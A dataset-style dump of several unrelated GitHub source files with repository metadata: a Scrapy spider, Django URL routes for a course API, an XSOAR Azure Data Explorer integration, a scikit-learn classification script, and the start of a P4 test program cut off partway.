blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d54e532e6ca44bc53831b5abdcf003a2c8825d08 | 73db66a771cbef43abf1fefc7e0d210001ec2b4a | /example/example/spiders/book_spider.py | 49c774a8c963ad55285e8c1f814908dc49c7ee0e | [] | no_license | tianrking/Scrapy_Demo | 52008c094d4858383a61c2fd03ba3aa0dddcb3b9 | 9c621d2e1175aac5cfff0f42fc7667be6f46c9c1 | refs/heads/master | 2020-12-14T21:18:33.356797 | 2020-02-03T08:24:48 | 2020-02-03T08:24:48 | 234,871,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 901 | py | import scrapy
class BookSpider(scrapy.Spider):
    """Spider that scrapes the area-statistics blocks from the DXY nCoV page.

    Yields one item per area block with a single 'name' field.
    """
    name = "books"
    start_urls = ["https://ncov.dxy.cn/ncovh5/view/pneumonia"]
    # start_urls = ["http://books.toscrape.com/"]

    def parse(self, response):
        # Each area block is a <div> whose class starts with "areaBlock2";
        # the trailing hash suffix is generated by the site's CSS tooling.
        for block in response.css('div.areaBlock2___27vn7'):
            # Fixed: the original XPath './p[@class="subBlock*]' had an
            # unclosed quote and used '*' as a wildcard, which is invalid in
            # an XPath attribute equality test. Prefix matching requires
            # starts-with(); extract_first() pulls the text out of the
            # SelectorList (the original yielded the selector itself).
            name = block.xpath(
                './p[starts-with(@class, "subBlock")]/text()').extract_first()
            yield {
                'name': name,
            }
# next_url=response.css('ul.pager li.next a::attr(href)').extract_first()
# if next_url:
# next_url= response.urljoin(next_url)
# yield scrapy.Request(next_url,callback=self.parse) | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
c786245e6f92c1f9c62b1acb26e39a9ac9f11ac1 | fafa39d9eda46f5ee0d3ac7bf199237e7a748931 | /API/course/urls.py | 1c02cf1d5389151843b1392e818592f06517b2a3 | [
"MIT"
] | permissive | kasimbozdag/SWE_573 | bfb137b6db94619d76082ea3884036d64cfe934d | 4bce24f98fe6980b1f2c83196b8454b56118186b | refs/heads/master | 2022-02-18T11:42:04.363376 | 2019-05-29T09:56:19 | 2019-05-29T09:56:19 | 171,244,989 | 0 | 0 | MIT | 2022-02-10T10:36:38 | 2019-02-18T08:35:15 | JavaScript | UTF-8 | Python | false | false | 1,259 | py | from django.conf.urls import url
from . import views
# URL routes for the course API.
# NOTE: order matters — Django resolves against the first matching regex,
# and none of these patterns are anchored with '$', so the more specific
# routes must stay above the generic numeric '(?P<pk>[0-9]+)' catch-all
# at the bottom.  # NOTE(review): unanchored prefixes mean '^list' also
# matches e.g. 'list-extra' — confirm this is intentional.
urlpatterns = [
    url(r'^create_course', views.CourseCreateAPIView.as_view(), name="create-course"),
    url(r'^list', views.CourseListAPIView.as_view(), name="courses"),
    url(r'^my', views.TeacherCoursesAPIView.as_view(), name="my-courses"),
    # Activation toggles for a single course identified by primary key.
    url(r'^(?P<pk>[0-9]+)/inactivate', views.CourseInactivateAPIView.as_view(), name="inactivate"),
    url(r'^(?P<pk>[0-9]+)/activate', views.CourseActivateAPIView.as_view(), name="activate"),
    # Enrollment endpoints: listing, enrolling in and dropping a course.
    url(r'^enrolled', views.EnrolledCourseAPIView.as_view(), name="enroll-list"),
    url(r'^(?P<pk>[0-9]+)/enroll', views.EnrollCourseAPIView.as_view(), name="enroll"),
    url(r'^(?P<pk>[0-9]+)/drop', views.EnrollmentAPIView.as_view(), name="drop"),
    # Prerequisite management: (object model/pk, prerequisite model/pk).
    url(r'^(?P<obj_model>[0-9]+)/(?P<obj_pk>[0-9]+)/(?P<p_model>[0-9]+)/(?P<p_pk>[0-9]+)', views.PrerequisiteCreateAPIView.as_view(), name="pre"),
    url(r'^prerequisite/(?P<pk>[0-9]+)', views.PrerequisiteAPIView.as_view(), name="pre-delete"),
    url(r'^(?P<obj_model>[A-Za-z]+)/(?P<obj_pk>[0-9]+)', views.FullFilledCreateAPIView.as_view(), name="full"),
    # Generic course detail — must remain last among the numeric routes.
    url(r'^(?P<pk>[0-9]+)', views.CourseAPIView.as_view(), name="course"),
    url(r'^models', views.ContentTypeListAPIView.as_view(), name="models"),
]
| [
"bozdag80@yahoo.com"
] | bozdag80@yahoo.com |
631ed22a4ad5c8562b3a2322cf4296eb416e9432 | 0d55bde6f4784f6dea9e8e6945d05bbf627e1e7d | /Packs/AzureDataExplorer/Integrations/AzureDataExplorer/AzureDataExplorer.py | 61982787a34eb6d8b32572cb86ef1ab05b7453ec | [
"MIT"
] | permissive | crestdatasystems/content | d7040415431b5d06d1569433a49869afcb0292bd | 5f0f00840c39f028dca8377551bbd725d8ee8a2d | refs/heads/master | 2023-08-16T19:35:38.150912 | 2023-07-11T05:59:59 | 2023-07-11T05:59:59 | 280,669,011 | 2 | 1 | MIT | 2023-03-10T16:00:35 | 2020-07-18T14:06:44 | Python | UTF-8 | Python | false | false | 25,963 | py | # type: ignore
# Disable insecure warnings
from CommonServerPython import *
''' IMPORTS '''
import uuid
from typing import Dict, List
from decimal import Decimal
import requests
from azure.kusto.data.response import KustoResponseDataSet, KustoResponseDataSetV1
from datetime import datetime
from MicrosoftApiModule import * # noqa: E402
''' CONSTANTS '''
DEFAULT_PAGE_NUMBER = '1'
DEFAULT_LIMIT = '50'
DATE_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S'
REQUEST_BASE_TIMEOUT = 20
GRANT_BY_CONNECTION = {'Device Code': DEVICE_CODE, 'Authorization Code': AUTHORIZATION_CODE}
class DataExplorerClient:
    """
    Azure Data Explorer API Client.

    Wraps the shared MicrosoftClient OAuth2 helper (from MicrosoftApiModule)
    and exposes the two Kusto REST endpoints used by this integration:
    ``/v1/rest/query`` for data queries and ``/v1/rest/mgmt`` for
    management (control) commands.
    """

    def __init__(self, cluster_url: str, client_id: str, client_activity_prefix: str, verify: bool,
                 proxy: bool, connection_type: str, tenant_id: str = None, enc_key: str = None,
                 auth_code: str = None, redirect_uri: str = None):
        if '@' in client_id:  # for use in test-playbook
            # "client_id@refresh_token" form: stash the refresh token in the
            # integration context so the test playbook can authenticate.
            client_id, refresh_token = client_id.split('@')
            integration_context = get_integration_context()
            integration_context.update(current_refresh_token=refresh_token)
            set_integration_context(integration_context)
        if not cluster_url.startswith('https://'):
            raise ValueError(
                "Cluster URL parameter must contain "
                "'https://' as prefix (e.g. https://help.kusto.windows.net).")
        self.cluster_url = cluster_url
        # Bare hostname, used for the explicit Host header in http_request.
        self.host = cluster_url.split("https://")[1]
        # Device-code flow impersonates the user against the cluster itself;
        # authorization-code flow uses the ARM management scope instead.
        self.scope = f'{cluster_url}/user_impersonation offline_access user.read' if 'Authorization' not in connection_type \
            else 'https://management.azure.com/.default'
        self.client_activity_prefix = client_activity_prefix
        # assign_params drops None values, so optional auth parameters are
        # only forwarded when the user actually configured them.
        client_args = assign_params(
            self_deployed=True,
            auth_id=client_id,
            token_retrieval_url='https://login.microsoftonline.com/organizations/oauth2/v2.0/token',
            grant_type=GRANT_BY_CONNECTION[connection_type],
            base_url=cluster_url,
            verify=verify,
            proxy=proxy,
            scope=self.scope,
            tenant_id=tenant_id,
            enc_key=enc_key,
            auth_code=auth_code,
            redirect_uri=redirect_uri
        )
        self.ms_client = MicrosoftClient(**client_args)
        self.connection_type = connection_type

    def http_request(self, method, url_suffix: str = None, full_url: str = None, params: dict = None, headers=None,
                     data=None, timeout: int = REQUEST_BASE_TIMEOUT):
        """
        Perform an authenticated HTTP request against the cluster.

        Adds the headers the Kusto REST API expects, treats the listed 4xx
        codes as "handled" so their JSON error payload can be converted into
        a readable ValueError, and returns the parsed JSON body on success.
        """
        if headers is None:
            headers = {}
        if data is None:
            data = {}
        headers.update({
            'Accept': 'application/json',
            'Expect': '100-Continue',
            'Content-Type': 'application/json; charset=utf-8',
            'Host': self.host,
            'Connection': 'Keep-Alive',
        })
        # The 4xx codes are included in ok_codes so MicrosoftClient does not
        # raise on them; we surface their error payload ourselves below.
        res = self.ms_client.http_request(method=method,
                                          url_suffix=url_suffix,
                                          full_url=full_url,
                                          headers=headers,
                                          json_data=data,
                                          params=params,
                                          resp_type='response',
                                          timeout=timeout,
                                          ok_codes=(200, 204, 400, 401, 403, 404, 409))
        # Successful responses with an empty body cannot be JSON-decoded.
        if res.status_code in (200, 204) and not res.text:
            return res
        res_json = res.json()
        if res.status_code in (400, 401, 403, 404, 409):
            code = res_json.get('error', {}).get('code', 'Error')
            error_msg = res_json.get('error', {}).get('message', res_json)
            raise ValueError(
                f'[{code} {res.status_code}] {error_msg}'
            )
        return res_json

    def search_query_execute_request(self, database_name: str, query: str,
                                     server_timeout: Decimal, client_activity_id: str) -> Dict[str, Any]:
        """
        Execute a KQL query against the given database inside the specified cluster.
        The query's client activity ID is a combination of the user's
        client_activity_prefix parameter and a random UUID.
        Args:
            database_name (str): The name of the database to execute the query on.
            query (str): The KQL query to execute against the database.
            server_timeout (Decimal): Query execution timeout on server side, in minutes.
            client_activity_id (str): A unique ID for query execution.
        Returns:
            Dict[str,Any]: API response from Azure.
        """
        # "servertimeout" is a Kusto client-request property, expressed here
        # in minutes (the trailing 'm').
        data = retrieve_common_request_body(database_name, query, {
            "Options": {
                "servertimeout": f"{server_timeout}m"
            }
        })
        headers = {
            "x-ms-client-request-id": client_activity_id
        }
        # The HTTP timeout must outlive the server-side timeout, otherwise
        # long queries would be aborted client-side first.
        response = self.http_request(
            "POST", url_suffix="/v1/rest/query", data=data, headers=headers,
            timeout=calculate_total_request_timeout(server_timeout))
        return response

    def search_queries_list_request(self, database_name: str,
                                    client_activity_id: str) -> Dict[str, Any]:
        """
        List search queries that have reached a final state on the given database.
        When the client_activity_id argument is provided, the request will retrieve information
        regarding specific search query.
        Args:
            database_name (str): The name of the database to see the completed queries.
            client_activity_id (str): client-specified identity of the request.
        Returns:
            Dict[str, Any]: API response from Azure.
        """
        mgmt_query = f".show queries | where ClientActivityId=='{client_activity_id}'" if client_activity_id \
            else ".show queries | sort by StartedOn"
        return self.management_query_request(database_name, mgmt_query)

    def running_search_queries_list_request(self, database_name: str, client_activity_id: str) -> \
            Dict[str, Any]:
        """
        List currently running search queries on the given database.
        When client_activity_id argument is set, the request will retrieve information
        regarding specific running search query.
        Args:
            database_name (str): The name of the database to see the running queries.
            client_activity_id (str): Client-specified identity of the request.
        Returns:
            Dict[str, Any]: API response from Azure.
        """
        mgmt_query = f".show running queries | where ClientActivityId=='{client_activity_id}'" if client_activity_id \
            else ".show running queries | sort by StartedOn"
        return self.management_query_request(database_name, mgmt_query)

    def running_search_query_delete_request(self, database_name: str, client_activity_id: str,
                                            reason: str) -> Dict[str, Any]:
        """
        Starts a best-effort attempt to cancel a specific running search query
        on the given database.
        Args:
            database_name (str): The name of the database to see the completed queries on.
            client_activity_id (str): Client specified identity of the request.
            reason (str): The reason for the cancellation (optional; appended
                to the cancel command only when non-empty).
        Returns:
            Dict[str, Any]: API response from Azure.
        """
        cancel_running_query = f".cancel query '{client_activity_id}'"
        if reason:
            cancel_running_query += f" with ( reason = '{reason}' )"
        return self.management_query_request(database_name, cancel_running_query)

    def management_query_request(self, database_name: str, mgmt_query: str) -> Dict[str, Any]:
        """
        API call method for management query endpoint.
        Each request that uses the management query endpoint goes through this method.
        Args:
            database_name (str): The name of the database to run the management command on.
            mgmt_query (str): The Kusto control command (".show"/".cancel" etc.) to run.
        Returns:
            Dict[str, Any]: API response from Azure.
        """
        data = retrieve_common_request_body(database_name, mgmt_query)
        response = self.http_request("POST", url_suffix="/v1/rest/mgmt", data=data)
        return response
def search_query_execute_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
    """
    Execute a KQL search query against the given database.

    Args:
        client (DataExplorerClient): Azure Data Explorer API client.
        args (Dict[str, Any]): Command arguments from XSOAR.

    Returns:
        CommandResults: Command results with raw response, outputs and readable outputs.
    """
    kql_query = str(args['query'])
    db_name = str(args['database_name'])
    server_timeout = Decimal(args.get('timeout', '5'))
    if not (0 <= server_timeout <= 60):
        raise ValueError("Timeout argument should be a float number between 0 to 60.")
    # The activity ID ties this XSOAR request to the query on the Kusto side.
    activity_id = f"{client.client_activity_prefix};{uuid.uuid4()}"
    raw_response = client.search_query_execute_request(db_name, kql_query, server_timeout, activity_id)
    rows = convert_kusto_response_to_dict(KustoResponseDataSetV1(raw_response))
    context = {
        'Database': db_name,
        'Query': kql_query,
        'ClientActivityID': activity_id,
        'PrimaryResults': rows
    }
    markdown = tableToMarkdown(
        f'Results of executing search query with client activity ID: {activity_id}',
        rows, headerTransform=pascalToSpace)
    return CommandResults(
        outputs_prefix='AzureDataExplorer.SearchQueryResults',
        outputs_key_field='ClientActivityID',
        outputs=context,
        raw_response=raw_response,
        readable_output=markdown
    )
def search_queries_list_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
    """
    List search queries that have reached a final state on the database.

    Args:
        client (DataExplorerClient): Azure Data Explorer API client.
        args (Dict[str, Any]): Command arguments from XSOAR.

    Returns:
        CommandResults: Command results with raw response, outputs and readable outputs.
    """
    db_name = str(args['database_name'])
    activity_id = str(args.get('client_activity_id', ''))
    page_number = arg_to_number(args.get('page', DEFAULT_PAGE_NUMBER))
    records_per_page = arg_to_number(args.get('page_size'))
    max_records = arg_to_number(args.get('limit', DEFAULT_LIMIT))
    validate_list_command_arguments(page_number, records_per_page, max_records)
    raw_response = client.search_queries_list_request(db_name, activity_id)
    return retrieve_command_results_of_list_commands(
        raw_response, 'List of Completed Search Queries',
        page_number, records_per_page, max_records, 'AzureDataExplorer.SearchQuery')
def running_search_queries_list_command(client: DataExplorerClient, args: Dict[str, Any]) -> CommandResults:
    """
    List currently running search queries on the database.

    Args:
        client (DataExplorerClient): Azure Data Explorer API client.
        args (Dict[str, Any]): Command arguments from XSOAR.

    Returns:
        CommandResults: Command results with raw response, outputs and readable outputs.
    """
    db_name = str(args['database_name'])
    activity_id = str(args.get('client_activity_id', ''))
    page_number = arg_to_number(args.get('page', DEFAULT_PAGE_NUMBER))
    records_per_page = arg_to_number(args.get('page_size'))
    max_records = arg_to_number(args.get('limit', DEFAULT_LIMIT))
    validate_list_command_arguments(page_number, records_per_page, max_records)
    raw_response = client.running_search_queries_list_request(db_name, activity_id)
    return retrieve_command_results_of_list_commands(
        raw_response, 'List of Currently running Search Queries',
        page_number, records_per_page, max_records, 'AzureDataExplorer.RunningSearchQuery')
def running_search_query_cancel_command(client: DataExplorerClient, args: Dict[str, Any]) -> \
        CommandResults:
    """
    Cancel a currently running search query.

    Args:
        client (DataExplorerClient): Azure Data Explorer API client.
        args (Dict[str, Any]): Command arguments from XSOAR.

    Returns:
        CommandResults: Command results with raw response, outputs and readable outputs.
    """
    client_activity_id = str(args['client_activity_id'])
    database_name = str(args['database_name'])
    # Fix: args.get('reason') returns None when the argument is omitted, and
    # str(None) == 'None' is truthy, so the cancel command used to be sent
    # with the bogus reason 'None'. Default to '' (consistent with how the
    # optional client_activity_id is handled in the list commands).
    reason = str(args.get('reason', ''))
    response = client.running_search_query_delete_request(
        database_name, client_activity_id, reason)
    response_kusto_dataset = KustoResponseDataSetV1(response)
    outputs = convert_kusto_response_to_dict(response_kusto_dataset)
    readable_output = tableToMarkdown(f'Canceled Search Query {client_activity_id}',
                                      outputs,
                                      headers=[
                                          'ClientRequestId', 'ReasonPhrase',
                                          'RunningQueryCanceled'],
                                      headerTransform=pascalToSpace)
    return CommandResults(
        outputs_prefix='AzureDataExplorer.CanceledSearchQuery',
        outputs_key_field='ClientRequestId',
        outputs=outputs,
        raw_response=response,
        readable_output=readable_output
    )
def retrieve_command_results_of_list_commands(response: Dict[str, Any], base_header: str,
                                              page: int, page_size: int, limit: int,
                                              outputs_prefix: str) -> CommandResults:
    """
    Build the CommandResults object shared by the list commands.

    Args:
        response (Dict[str,Any]): API response from Azure.
        base_header (str): Header prefix in the readable output.
        page (int): Page number.
        page_size (int): Page size.
        limit (int): Maximum number of records to return.
        outputs_prefix (str): Command context outputs prefix.

    Returns:
        CommandResults: List command results.
    """
    kusto_dataset = KustoResponseDataSetV1(response)
    row_total = kusto_dataset.primary_results[0].rows_count
    records = convert_kusto_response_to_dict(kusto_dataset, page, page_size, limit)
    header = format_header_for_list_commands(base_header, row_total, page, page_size, limit)
    table_columns = ['ClientActivityId', 'User', 'Text', 'Database',
                     'StartedOn', 'LastUpdatedOn', 'State']
    markdown = tableToMarkdown(header, records, headers=table_columns,
                               headerTransform=pascalToSpace)
    return CommandResults(
        outputs_prefix=outputs_prefix,
        outputs_key_field='ClientActivityId',
        outputs=records,
        raw_response=response,
        readable_output=markdown
    )
''' INTEGRATION HELPER METHODS '''
def convert_datetime_fields(raw_data: List[dict]) -> List[dict]:
    """
    Stringify datetime/timedelta values in the given rows, in place,
    so the response is JSON-serializable.

    Args:
        raw_data (List[dict]): Rows from the API call to Azure.

    Returns:
        List[dict]: The same list, with datetime-like values converted to str.
    """
    for record in raw_data:
        for field, field_value in record.items():
            if isinstance(field_value, datetime):
                record[field] = field_value.strftime(DATE_TIME_FORMAT)
            elif isinstance(field_value, timedelta):
                # A value is never both datetime and timedelta, so elif is safe.
                record[field] = str(field_value)
    return raw_data
def convert_kusto_response_to_dict(kusto_response: KustoResponseDataSet, page: int = None,
                                   page_size: int = None, limit: int = None) -> List[dict]:
    """
    Convert a KustoResponseDataSet object into a JSON-serializable list of dicts.

    Supports two pagination modes: manual (page + page_size) and
    automatic (limit only); with neither set, all rows are returned.

    Args:
        kusto_response (KustoResponseDataSet): The response from the API call.
        page (int): Page number to retrieve (manual pagination).
        page_size (int): Number of records per page (manual pagination).
        limit (int): Maximum number of results (automatic pagination).

    Returns:
        List[dict]: Converted response rows.
    """
    rows = kusto_response.primary_results[0].to_dict().get('data', [])
    if page and page_size:
        # Manual pagination: slice out the requested page window,
        # clamped to the available number of rows.
        start = min((page - 1) * page_size, len(rows))
        end = min(start + page_size, len(rows))
        selected = rows[start:end]
    elif limit:
        # Automatic pagination: take the first `limit` rows.
        selected = rows[:min(len(rows), limit)]
    else:
        # No pagination — used only by the search-query-execute command.
        selected = rows
    return convert_datetime_fields(selected)
def format_header_for_list_commands(base_header: str, rows_count: int,
                                    page: int, page_size: int, limit: int) -> str:
    """
    Build the readable-output header for list commands.

    The wording depends on the pagination mode: manual (page_size given)
    or automatic (limit only).

    Args:
        base_header (str): The header prefix.
        rows_count (int): The number of rows in the output.
        page (int): Client's page number argument.
        page_size (int): Number of records per page (falsy for automatic mode).
        limit (int): Client's limit argument.

    Returns:
        str: Header for the command's readable output.
    """
    if page_size:
        # Manual pagination: report the page position out of the total.
        full_pages, remainder = divmod(rows_count, page_size)
        total_pages = full_pages + (1 if remainder else 0)
        if rows_count > 0:
            return (base_header
                    + f' \nShowing page {page} out of {total_pages} total pages.'
                    + f' Current page size: {page_size}.')
        return base_header
    # Automatic pagination: report the record window only.
    return base_header + f' \nShowing 0 to {limit} records out of {rows_count}.'
def retrieve_common_request_body(database_name: str, query: str,
                                 properties: Dict[str, Any] = None) -> Dict[str, Any]:
    """
    Build the request body shared by all Kusto REST calls.

    Every request body carries the database name ("db") and the query or
    control command to execute ("csl"); client request properties are
    attached only when provided.

    Args:
        database_name (str): The database name.
        query (str): The query to execute.
        properties (Dict[str, Any], optional): Extra client request
            properties to send. Defaults to None.

    Returns:
        Dict[str, Any]: Raw body data for the request.
    """
    body: Dict[str, Any] = dict(db=database_name, csl=query)
    return dict(body, properties=properties) if properties else body
def calculate_total_request_timeout(server_timeout: Decimal) -> int:
    """
    Compute the total HTTP timeout for a query execution request.

    The client-side timeout must outlive the server-side query timeout,
    so the integration's base request timeout is added on top of it.

    Args:
        server_timeout (Decimal): Query execution timeout on server side, in minutes.

    Returns:
        int: Total timeout duration of the request, in seconds.
    """
    return REQUEST_BASE_TIMEOUT + int(server_timeout * 60)
def validate_list_command_arguments(page: int, page_size: int, limit: int) -> None:
    """
    Validate page number, page size and limit arguments of list commands.

    Args:
        page (int): The page number (must be >= 1).
        page_size (int): Number of records per page. May be None when the
            user did not supply it; validated only when provided.
        limit (int): Limit on number of records (must be >= 1).

    Raises:
        ValueError: If any provided argument is less than 1.
    """
    # Fix: the original condition `not page >= 1 and limit >= 1 and page_size >= 1`
    # bound `not` only to the first comparison, so invalid limit/page_size
    # values were never rejected, and an omitted (None) page_size raised a
    # TypeError whenever page < 1.
    if page < 1 or limit < 1 or (page_size is not None and page_size < 1):
        raise ValueError("Page and limit arguments must be integers greater than 0.")
''' AUTHORIZATION METHODS '''
def start_auth(client: DataExplorerClient) -> CommandResults:
    """
    Kick off the device-code authorization flow.

    Args:
        client (DataExplorerClient): Azure Data Explorer API client.

    Returns:
        CommandResults: Human-readable authentication guidelines.
    """
    guidelines = client.ms_client.start_auth('!azure-data-explorer-auth-complete')
    return CommandResults(readable_output=guidelines)
def complete_auth(client: DataExplorerClient) -> str:
"""
Start the authorization process.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
Returns:
str: Message about completing the authorization process successfully.
"""
client.ms_client.get_access_token()
return '✅ Authorization completed successfully.'
def reset_auth() -> str:
    """
    Reset the stored authorization state.

    Returns:
        str: Message describing how to restart the authentication process.
    """
    # Wipe the cached tokens/refresh token kept in the integration context.
    set_integration_context({})
    return ('Authorization was reset successfully. Run **!azure-data-explorer-auth-start** '
            'to start the authentication process.')
def test_connection(client: DataExplorerClient) -> str:
"""
Test the connection with Azure Data Explorer service.
Args:
client (DataExplorerClient): Azure Data Explorer API client.
Returns:
str: Message about successfully connected to the Azure Data Explorer.
"""
client.ms_client.get_access_token()
return '✅ Success!'
def test_module(client: DataExplorerClient) -> str:
"""Tests API connectivity and authentication for client credentials only.
Returning 'ok' indicates that the integration works like it is supposed to.
Connection to the service is successful.
Raises exceptions if something goes wrong.
:type client: ``Client``
:param Client: client to use
:return: 'ok' if test passed.
:rtype: ``str``
"""
# This should validate all the inputs given in the integration configuration panel,
# either manually or by using an API that uses them.
if 'Authorization' not in client.connection_type:
raise DemistoException(
"Please enable the integration and run `!azure-data-explorer-auth-start`"
"and `!azure-data-explorer-auth-complete` to log in."
"You can validate the connection by running `!azure-data-explorer-auth-test`\n"
"For more details press the (?) button.")
else:
raise Exception("When using user auth flow configuration, "
"Please enable the integration and run the "
"!azure-data-explorer-auth-test command in order to test it")
def main() -> None:
    """
    Parse and validate the integration parameters, build the client and
    dispatch the invoked command. All errors are funnelled through
    return_error with a friendlier message for known failure modes.
    """
    params: Dict[str, Any] = demisto.params()
    args: Dict[str, Any] = demisto.args()
    cluster_url = params['cluster_url']
    client_id = params['client_id']
    client_activity_prefix = params.get('client_activity_prefix')
    verify_certificate: bool = not params.get('insecure', False)
    proxy = params.get('proxy', False)
    # Credentials-type parameters store their secret under 'password'.
    enc_key = (params.get('credentials', {})).get('password')
    tenant_id = params.get('tenant_id')
    connection_type = params.get('authentication_type', 'Device Code')
    auth_code = (params.get('auth_code', {})).get('password')
    redirect_uri = params.get('redirect_uri')
    command = demisto.command()
    demisto.debug(f'Command being called is {command}')
    try:
        requests.packages.urllib3.disable_warnings()
        client: DataExplorerClient = DataExplorerClient(cluster_url, client_id, client_activity_prefix,
                                                        verify_certificate, proxy, connection_type,
                                                        tenant_id, enc_key, auth_code, redirect_uri)
        # Data-plane commands that all take (client, args).
        commands = {
            'azure-data-explorer-search-query-execute': search_query_execute_command,
            'azure-data-explorer-search-query-list': search_queries_list_command,
            'azure-data-explorer-running-search-query-list': running_search_queries_list_command,
            'azure-data-explorer-running-search-query-cancel': running_search_query_cancel_command,
        }
        # Auth/utility commands have differing signatures, so they are
        # dispatched explicitly rather than through the table above.
        if command == 'test-module':
            return_results(test_module(client))
        elif command == 'azure-data-explorer-generate-login-url':
            return_results(generate_login_url(client.ms_client))
        elif command == 'azure-data-explorer-auth-start':
            return_results(start_auth(client))
        elif command == 'azure-data-explorer-auth-complete':
            return_results(complete_auth(client))
        elif command == 'azure-data-explorer-auth-reset':
            return_results(reset_auth())
        elif command == 'azure-data-explorer-auth-test':
            return_results(test_connection(client))
        elif command in commands:
            return_results(commands[command](client, args))
        else:
            raise NotImplementedError(f'{command} command is not implemented.')
    except Exception as e:
        error_text = str(e)
        # Map known opaque Kusto errors to actionable messages.
        if "OneApiErrors" in error_text:
            error_text = "The execution of search query failed due a client cancel request."
        elif "Request execution timeout" in error_text:
            error_text = "Search query execution took longer than the assigned timeout" \
                         " value and has been aborted."
        return_error(f'Failed to execute {command} command.\nError:\n{error_text}')


# '__builtin__'/'builtins' cover execution inside the XSOAR script runner.
if __name__ in ('__main__', '__builtin__', 'builtins'):
    main()
| [
"noreply@github.com"
] | crestdatasystems.noreply@github.com |
401fce8967d656ccb95f7f42b57e3d4814b4d9c3 | aae551baa369fda031f363c2afbdf1984467f16d | /Machine_Learning/Contest/Code/gaussian_process.py | 879a09d88af6d3a713ec7d9b52d8ab5d61a59578 | [] | no_license | ameet-1997/Course_Assignments | 37f7d4115baec383ccf029772efcf9c33beb2a23 | 629e9d5cfc6fa6cf37a96c5fcc33bc669cbdc59d | refs/heads/master | 2021-05-16T16:23:32.731296 | 2018-02-03T05:57:01 | 2018-02-03T05:57:01 | 119,939,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | import pandas as pd
import numpy as np
from sklearn.preprocessing import Imputer
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.utils import shuffle
import time
from sklearn.svm import SVC
from sklearn.ensemble import BaggingClassifier
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.gaussian_process import GaussianProcessClassifier
# Load the data and impute missing values using the MEDIAN
# (the original comment said "mean", but strategy='median' is used below).
train_data = pd.read_csv("train.csv")
# Get the train labels (last column) and keep only the feature columns
# (dropping the first id column and the label).
train_labels = train_data.iloc[:,-1]
train_data = train_data.iloc[:,1:-1]
# Impute it (fit on train; the same fitted imputer is reused for test below).
i = Imputer(strategy='median')
train_data = i.fit_transform(train_data)
test_data = pd.read_csv("test.csv")
test_data = test_data.iloc[:,1:]
test_data = i.transform(test_data)
# Hold out a stratified validation set of 1000 samples.
train_data, validation_data, train_labels, validation_labels = train_test_split(train_data, train_labels, test_size=1000, stratify=np.array(train_labels))
# Dimensionality reduction to 200 components; the same projection is
# applied to validation and test so the feature spaces match.
pca = PCA(n_components=200)
pca.fit(train_data, train_labels)
train_data = pca.transform(train_data)
validation_data = pca.transform(validation_data)
test_data = pca.transform(test_data)
# Fit a Gaussian process classifier and score it on the validation split.
start_time = time.time()
lin = GaussianProcessClassifier(n_jobs=-1, max_iter_predict=10, warm_start=True)
lin.fit(train_data, train_labels)
predicted_labels = lin.predict(validation_data)
# Macro-averaged F1 treats all classes equally regardless of support.
print("Validation Score: "+str(f1_score(validation_labels, predicted_labels, average='macro')))
print("Total time: "+str(time.time()-start_time))
# test_labels.to_csv("gaussian_process1.csv", index=True, index_label=['id','label']) | [
"ameetsd97@gmail.com"
] | ameetsd97@gmail.com |
b03a0215246eb83e851d9f6c084dc32406b38a7b | ddf2e85b8e8fda8cbaf92fc79a53abdb962c8bde | /tests/violated/unused_return/orig.py | abab334f0f228067c4361058deb44c937a78d4aa | [
"Apache-2.0"
] | permissive | p4gauntlet/toz3 | 359bd20bdc8fe2b7ccf3564a90988823d94df078 | 0fddd9e21ac7b80e4a0bf8a4e6b1bdcc01308724 | refs/heads/master | 2023-05-11T17:23:10.972917 | 2023-05-09T16:02:56 | 2023-05-09T16:02:56 | 329,900,719 | 4 | 0 | Apache-2.0 | 2023-02-22T23:28:49 | 2021-01-15T12:03:53 | Python | UTF-8 | Python | false | false | 17,966 | py | from p4z3 import *
def p4_program(prog_state):
prog_state.declare_global(
Enum( "error", ["NoError", "PacketTooShort", "NoMatch", "StackOutOfBounds", "HeaderTooShort", "ParserTimeout", "ParserInvalidArgument", ])
)
prog_state.declare_global(
P4Extern("packet_in", type_params=[], methods=[P4Declaration("extract", P4Method("extract", type_params=(None, [
"T",]), params=[
P4Parameter("out", "hdr", "T", None),])), P4Declaration("extract", P4Method("extract", type_params=(None, [
"T",]), params=[
P4Parameter("out", "variableSizeHeader", "T", None),
P4Parameter("in", "variableFieldSizeInBits", z3.BitVecSort(32), None),])), P4Declaration("lookahead", P4Method("lookahead", type_params=("T", [
"T",]), params=[])), P4Declaration("advance", P4Method("advance", type_params=(None, []), params=[
P4Parameter("in", "sizeInBits", z3.BitVecSort(32), None),])), P4Declaration("length", P4Method("length", type_params=(z3.BitVecSort(32), []), params=[])), ])
)
prog_state.declare_global(
P4Extern("packet_out", type_params=[], methods=[P4Declaration("emit", P4Method("emit", type_params=(None, [
